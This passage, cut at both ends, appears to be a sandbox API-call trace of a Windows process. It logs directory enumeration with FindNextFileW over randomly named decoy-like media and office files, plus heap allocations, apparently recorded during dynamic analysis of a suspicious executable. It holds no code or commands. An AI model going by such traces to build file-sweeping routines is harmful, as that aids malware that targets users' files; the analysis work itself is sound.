ftLastAccessTime.dwHighDateTime=0x1d5dbd9, ftLastWriteTime.dwLowDateTime=0x112dad50, ftLastWriteTime.dwHighDateTime=0x1d5dbd9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8af8 [0073.019] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdf770280, ftCreationTime.dwHighDateTime=0x1d5e66d, ftLastAccessTime.dwLowDateTime=0x112dad50, ftLastAccessTime.dwHighDateTime=0x1d5dbd9, ftLastWriteTime.dwLowDateTime=0x112dad50, ftLastWriteTime.dwHighDateTime=0x1d5dbd9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0073.019] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa554300, ftCreationTime.dwHighDateTime=0x1d5e54b, ftLastAccessTime.dwLowDateTime=0xd5e4b850, ftLastAccessTime.dwHighDateTime=0x1d5e3e5, ftLastWriteTime.dwLowDateTime=0xd5e4b850, ftLastWriteTime.dwHighDateTime=0x1d5e3e5, nFileSizeHigh=0x0, nFileSizeLow=0x329b, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="BhG Xz5NyPYF_.flv", cAlternateFileName="BHGXZ5~1.FLV")) returned 1 [0073.019] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.019] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.019] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.019] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.019] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.019] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.019] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.019] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.019] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.019] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5eb2fb80, ftCreationTime.dwHighDateTime=0x1d5e34e, ftLastAccessTime.dwLowDateTime=0x2454b2e0, ftLastAccessTime.dwHighDateTime=0x1d5e10e, ftLastWriteTime.dwLowDateTime=0x2454b2e0, ftLastWriteTime.dwHighDateTime=0x1d5e10e, nFileSizeHigh=0x0, nFileSizeLow=0x44c1, dwReserved0=0x10, dwReserved1=0x657690, cFileName="bqTv.png", cAlternateFileName="")) returned 1 [0073.019] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.019] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.019] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.019] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.019] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d1bc810, ftCreationTime.dwHighDateTime=0x1d5e129, ftLastAccessTime.dwLowDateTime=0x37bccaf0, ftLastAccessTime.dwHighDateTime=0x1d5e705, ftLastWriteTime.dwLowDateTime=0x37bccaf0, ftLastWriteTime.dwHighDateTime=0x1d5e705, nFileSizeHigh=0x0, nFileSizeLow=0x1267f, dwReserved0=0x10, dwReserved1=0x657690, cFileName="dU_Aud-fZ3ji9.ppt", cAlternateFileName="DU_AUD~1.PPT")) returned 1 [0073.020] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaca41e0, ftCreationTime.dwHighDateTime=0x1d5e740, ftLastAccessTime.dwLowDateTime=0x9aebd660, ftLastAccessTime.dwHighDateTime=0x1d5e6d4, ftLastWriteTime.dwLowDateTime=0x9aebd660, ftLastWriteTime.dwHighDateTime=0x1d5e6d4, nFileSizeHigh=0x0, nFileSizeLow=0x1040, dwReserved0=0x10, dwReserved1=0x657690, cFileName="I_yvZxV2VbG06XDhaG1Z.mp4", cAlternateFileName="I_YVZX~1.MP4")) returned 1 [0073.020] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e4617a0, ftCreationTime.dwHighDateTime=0x1d5e321, ftLastAccessTime.dwLowDateTime=0x787174a0, ftLastAccessTime.dwHighDateTime=0x1d5d7ed, ftLastWriteTime.dwLowDateTime=0x787174a0, ftLastWriteTime.dwHighDateTime=0x1d5d7ed, nFileSizeHigh=0x0, nFileSizeLow=0x3ec3, dwReserved0=0x10, dwReserved1=0x657690, cFileName="VmWpxwQdQUQhtrKz9rx.pptx", cAlternateFileName="VMWPXW~1.PPT")) returned 1 [0073.020] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0766700, ftCreationTime.dwHighDateTime=0x1d5e3a8, ftLastAccessTime.dwLowDateTime=0x54cf4160, ftLastAccessTime.dwHighDateTime=0x1d5d880, ftLastWriteTime.dwLowDateTime=0x54cf4160, ftLastWriteTime.dwHighDateTime=0x1d5d880, nFileSizeHigh=0x0, nFileSizeLow=0x68eb, dwReserved0=0x10, dwReserved1=0x657690, cFileName="WWhoeERioUR.swf", cAlternateFileName="WWHOEE~1.SWF")) returned 1 [0073.020] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x12c0069, ftCreationTime.dwLowDateTime=0xc2658, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x122006a, nFileSizeHigh=0xc2658, nFileSizeLow=0x27, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="a\x08", cAlternateFileName="haဓ\x03\x10")) returned 0 [0073.020] FindClose (in: hFindFile=0x6b8af8 | out: hFindFile=0x6b8af8) returned 1 [0073.020] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b818900, ftCreationTime.dwHighDateTime=0x1d5d8b1, ftLastAccessTime.dwLowDateTime=0x575d47f0, ftLastAccessTime.dwHighDateTime=0x1d5e344, ftLastWriteTime.dwLowDateTime=0x575d47f0, ftLastWriteTime.dwHighDateTime=0x1d5e344, nFileSizeHigh=0x0, nFileSizeLow=0x12245, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="1SXWH1rq8k oa-Gv-.wav", cAlternateFileName="1SXWH1~1.WAV")) returned 1 [0073.020] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b318 [0073.020] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e20 [0073.020] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0073.020] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22e93f80, ftCreationTime.dwHighDateTime=0x1d5e220, ftLastAccessTime.dwLowDateTime=0x28f76500, ftLastAccessTime.dwHighDateTime=0x1d5d8c0, ftLastWriteTime.dwLowDateTime=0x28f76500, ftLastWriteTime.dwHighDateTime=0x1d5d8c0, nFileSizeHigh=0x0, nFileSizeLow=0xdbe2, dwReserved0=0x10, dwReserved1=0x657690, cFileName="4N8tFmD4.gif", cAlternateFileName="")) returned 1 [0073.020] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0073.020] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0073.020] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0073.021] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85f8d00, ftCreationTime.dwHighDateTime=0x1d5df36, ftLastAccessTime.dwLowDateTime=0xb42994b0, ftLastAccessTime.dwHighDateTime=0x1d5db9d, ftLastWriteTime.dwLowDateTime=0xb42994b0, ftLastWriteTime.dwHighDateTime=0x1d5db9d, nFileSizeHigh=0x0, nFileSizeLow=0xb2c5, dwReserved0=0x10, dwReserved1=0x657690, cFileName="5c0eXZdnCGl.mp3", cAlternateFileName="5C0EXZ~1.MP3")) returned 1 [0073.021] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b318 [0073.021] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.021] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0073.384] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3ce02d0, ftCreationTime.dwHighDateTime=0x1d5dba6, ftLastAccessTime.dwLowDateTime=0x59fa3130, ftLastAccessTime.dwHighDateTime=0x1d5de26, ftLastWriteTime.dwLowDateTime=0x59fa3130, ftLastWriteTime.dwHighDateTime=0x1d5de26, nFileSizeHigh=0x0, nFileSizeLow=0xe811, dwReserved0=0x10, dwReserved1=0x657690, cFileName="6EgOrexJkDL7op.mp3", cAlternateFileName="6EGORE~1.MP3")) returned 1 [0073.384] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0073.384] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e20 [0073.384] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0073.385] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb264fec0, ftCreationTime.dwHighDateTime=0x1d5ddb5, ftLastAccessTime.dwLowDateTime=0xf6077c70, ftLastAccessTime.dwHighDateTime=0x1d5e5fd, ftLastWriteTime.dwLowDateTime=0xf6077c70, ftLastWriteTime.dwHighDateTime=0x1d5e5fd, nFileSizeHigh=0x0, nFileSizeLow=0x13eeb, dwReserved0=0x10, dwReserved1=0x657690, cFileName="6F5BQoLL3Uym0CamPlpJ.jpg", cAlternateFileName="6F5BQO~1.JPG")) returned 1 [0073.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b318 [0073.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b810 [0073.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0073.385] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x394ea870, ftCreationTime.dwHighDateTime=0x1d5e43a, ftLastAccessTime.dwLowDateTime=0xdee48600, ftLastAccessTime.dwHighDateTime=0x1d5d905, ftLastWriteTime.dwLowDateTime=0xdee48600, ftLastWriteTime.dwHighDateTime=0x1d5d905, nFileSizeHigh=0x0, nFileSizeLow=0x110a7, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="6iBbdX1qsRyDlZ.swf", cAlternateFileName="6IBBDX~1.SWF")) returned 1 [0073.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0073.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0073.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0073.385] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x361d4d90, ftCreationTime.dwHighDateTime=0x1d5da95, ftLastAccessTime.dwLowDateTime=0x9aa79520, ftLastAccessTime.dwHighDateTime=0x1d5da15, ftLastWriteTime.dwLowDateTime=0x9aa79520, ftLastWriteTime.dwHighDateTime=0x1d5da15, nFileSizeHigh=0x0, nFileSizeLow=0x8577, dwReserved0=0x10, dwReserved1=0x657690, cFileName="7TIqi.m4a", cAlternateFileName="")) returned 1 [0073.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b318 [0073.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0073.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0073.385] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89da8c90, ftCreationTime.dwHighDateTime=0x1d5dddd, ftLastAccessTime.dwLowDateTime=0xab43cd40, ftLastAccessTime.dwHighDateTime=0x1d5d90c, ftLastWriteTime.dwLowDateTime=0xab43cd40, ftLastWriteTime.dwHighDateTime=0x1d5d90c, nFileSizeHigh=0x0, nFileSizeLow=0xeb7c, dwReserved0=0x10, dwReserved1=0x657690, cFileName="7zcAt1JobB0Roi5s.avi", cAlternateFileName="7ZCAT1~1.AVI")) returned 1 [0073.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0073.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0073.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0073.385] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x186c4af0, ftCreationTime.dwHighDateTime=0x1d5dd9a, ftLastAccessTime.dwLowDateTime=0x2cc965b0, ftLastAccessTime.dwHighDateTime=0x1d5e794, ftLastWriteTime.dwLowDateTime=0x2cc965b0, ftLastWriteTime.dwHighDateTime=0x1d5e794, nFileSizeHigh=0x0, nFileSizeLow=0xfb13, dwReserved0=0x10, dwReserved1=0x657690, cFileName="8dBnuAEyPilbFpD.gif", cAlternateFileName="8DBNUA~1.GIF")) returned 1 [0073.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b318 [0073.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0073.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0073.385] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9408690, ftCreationTime.dwHighDateTime=0x1d5e56a, ftLastAccessTime.dwLowDateTime=0x7aadcd00, ftLastAccessTime.dwHighDateTime=0x1d5d8d2, ftLastWriteTime.dwLowDateTime=0x7aadcd00, ftLastWriteTime.dwHighDateTime=0x1d5d8d2, nFileSizeHigh=0x0, nFileSizeLow=0x5c46, dwReserved0=0x10, dwReserved1=0x657690, cFileName="9MGcT.mp3", cAlternateFileName="")) returned 1 [0073.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0073.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.385] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0073.385] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa80ac680, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xa80ac680, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xb1dffa00, ftLastWriteTime.dwHighDateTime=0x1d661bc, nFileSizeHigh=0x0, nFileSizeLow=0xfdc00, dwReserved0=0x10, dwReserved1=0x657690, cFileName="bjqwuj.exe", cAlternateFileName="")) returned 1 [0073.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b318 [0073.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0073.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0073.386] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfee06400, ftCreationTime.dwHighDateTime=0x1d5d866, ftLastAccessTime.dwLowDateTime=0x9c0fa5c0, ftLastAccessTime.dwHighDateTime=0x1d5db77, ftLastWriteTime.dwLowDateTime=0x9c0fa5c0, ftLastWriteTime.dwHighDateTime=0x1d5db77, nFileSizeHigh=0x0, nFileSizeLow=0xe652, dwReserved0=0x10, dwReserved1=0x657690, cFileName="bQ9gmgo1CPU5L0JTf.png", cAlternateFileName="BQ9GMG~1.PNG")) returned 1 [0073.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0073.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0073.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0073.386] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7b58cd0, ftCreationTime.dwHighDateTime=0x1d5e423, ftLastAccessTime.dwLowDateTime=0x64768a0, ftLastAccessTime.dwHighDateTime=0x1d5e3d5, ftLastWriteTime.dwLowDateTime=0x64768a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d5, nFileSizeHigh=0x0, nFileSizeLow=0x81f0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="CosD3IMWD.wav", cAlternateFileName="COSD3I~1.WAV")) returned 1 [0073.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b318 [0073.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0073.386] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb59a9e50, ftCreationTime.dwHighDateTime=0x1d5d983, ftLastAccessTime.dwLowDateTime=0x6bc54d10, ftLastAccessTime.dwHighDateTime=0x1d5de75, ftLastWriteTime.dwLowDateTime=0x6bc54d10, ftLastWriteTime.dwHighDateTime=0x1d5de75, nFileSizeHigh=0x0, nFileSizeLow=0xf73d, dwReserved0=0x10, dwReserved1=0x657690, cFileName="DBSZqxeH.pps", cAlternateFileName="")) returned 1 [0073.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0073.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0073.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0073.386] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x10, dwReserved1=0x657690, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0073.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b318 [0073.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0073.386] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa00b9030, ftCreationTime.dwHighDateTime=0x1d5d7c1, ftLastAccessTime.dwLowDateTime=0xa6ca5750, ftLastAccessTime.dwHighDateTime=0x1d5df94, ftLastWriteTime.dwLowDateTime=0xa6ca5750, ftLastWriteTime.dwHighDateTime=0x1d5df94, nFileSizeHigh=0x0, nFileSizeLow=0x2520, dwReserved0=0x10, dwReserved1=0x657690, cFileName="FAlaByDgBqpgWn8JbOac.mp3", cAlternateFileName="FALABY~1.MP3")) returned 1 [0073.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0073.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b810 [0073.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0073.386] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ed1cf80, ftCreationTime.dwHighDateTime=0x1d5e7d3, ftLastAccessTime.dwLowDateTime=0xac0935f0, ftLastAccessTime.dwHighDateTime=0x1d5dbc6, ftLastWriteTime.dwLowDateTime=0xac0935f0, ftLastWriteTime.dwHighDateTime=0x1d5dbc6, nFileSizeHigh=0x0, nFileSizeLow=0x16c92, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="FL0fY8Lpz-WJNvLo.flv", cAlternateFileName="FL0FY8~1.FLV")) returned 1 [0073.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b318 [0073.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0073.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0073.386] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f29a7a0, ftCreationTime.dwHighDateTime=0x1d5e792, ftLastAccessTime.dwLowDateTime=0xea88a2f0, ftLastAccessTime.dwHighDateTime=0x1d5e311, ftLastWriteTime.dwLowDateTime=0xea88a2f0, ftLastWriteTime.dwHighDateTime=0x1d5e311, nFileSizeHigh=0x0, nFileSizeLow=0x14234, dwReserved0=0x10, dwReserved1=0x657690, cFileName="gJmnMJqziFMsIe_.wav", cAlternateFileName="GJMNMJ~1.WAV")) returned 1 [0073.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0073.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0073.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0073.386] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42ecd740, ftCreationTime.dwHighDateTime=0x1d5e024, ftLastAccessTime.dwLowDateTime=0x92721dc0, ftLastAccessTime.dwHighDateTime=0x1d5e470, ftLastWriteTime.dwLowDateTime=0x92721dc0, ftLastWriteTime.dwHighDateTime=0x1d5e470, nFileSizeHigh=0x0, nFileSizeLow=0x18b40, dwReserved0=0x10, dwReserved1=0x657690, cFileName="gV7qJagBY9A.mkv", cAlternateFileName="GV7QJA~1.MKV")) returned 1 [0073.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b318 [0073.386] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0073.387] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0073.387] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20d25ab0, ftCreationTime.dwHighDateTime=0x1d5dd70, ftLastAccessTime.dwLowDateTime=0xbb9f920, ftLastAccessTime.dwHighDateTime=0x1d5d7fe, ftLastWriteTime.dwLowDateTime=0xbb9f920, ftLastWriteTime.dwHighDateTime=0x1d5d7fe, nFileSizeHigh=0x0, nFileSizeLow=0x10f89, dwReserved0=0x10, dwReserved1=0x657690, cFileName="gx8HB3O7amX5sO9SwzMc.wav", cAlternateFileName="GX8HB3~1.WAV")) returned 1 [0073.387] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0073.387] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b810 [0073.387] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0073.424] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0f28b60, ftCreationTime.dwHighDateTime=0x1d5e03f, ftLastAccessTime.dwLowDateTime=0x2cab6d60, ftLastAccessTime.dwHighDateTime=0x1d5df44, ftLastWriteTime.dwLowDateTime=0x2cab6d60, ftLastWriteTime.dwHighDateTime=0x1d5df44, nFileSizeHigh=0x0, nFileSizeLow=0x15f5a, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="gyeJKtGlaF.bmp", cAlternateFileName="GYEJKT~1.BMP")) returned 1 [0073.424] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b318 [0073.424] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.424] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0073.424] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ab10d10, ftCreationTime.dwHighDateTime=0x1d5e2d8, ftLastAccessTime.dwLowDateTime=0xf7a7c0f0, ftLastAccessTime.dwHighDateTime=0x1d5de94, ftLastWriteTime.dwLowDateTime=0xf7a7c0f0, ftLastWriteTime.dwHighDateTime=0x1d5de94, nFileSizeHigh=0x0, nFileSizeLow=0x13f6b, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Iu4ghlu.mp4", cAlternateFileName="")) returned 1 [0073.424] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0073.424] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, 